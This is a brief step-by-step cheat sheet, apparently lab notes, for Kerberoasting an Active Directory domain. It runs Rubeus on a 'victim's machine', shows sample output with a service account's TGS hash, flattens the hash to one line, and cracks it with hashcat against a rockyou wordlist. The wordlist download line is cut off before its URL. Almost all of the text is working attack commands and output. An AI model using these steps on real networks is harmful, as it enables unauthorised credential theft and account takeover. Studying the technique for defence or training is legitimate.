Kerberoasting - Rubeus
- Launch rubeus on victim’s machine
Rubeus.exe kerberoast
- Wait for some hash to appear. Here is a truncated example.
[*] SamAccountName : SQLService
[*] DistinguishedName : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName : CONTROLLER-1/SQLService.CONTROLLER.local:30111
[*] PwdLastSet : 5/25/2020 10:28:26 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.local...
- Convert the hash block into single line.
cat hash_block | tr -d '\n' > hash_single_line
- Get a modified rockyou here (or use the whole rockyou inside
curl -OL
- Crack using hashcat.
hashcat -m 13100 -a 0 hash_single_line Pass.txt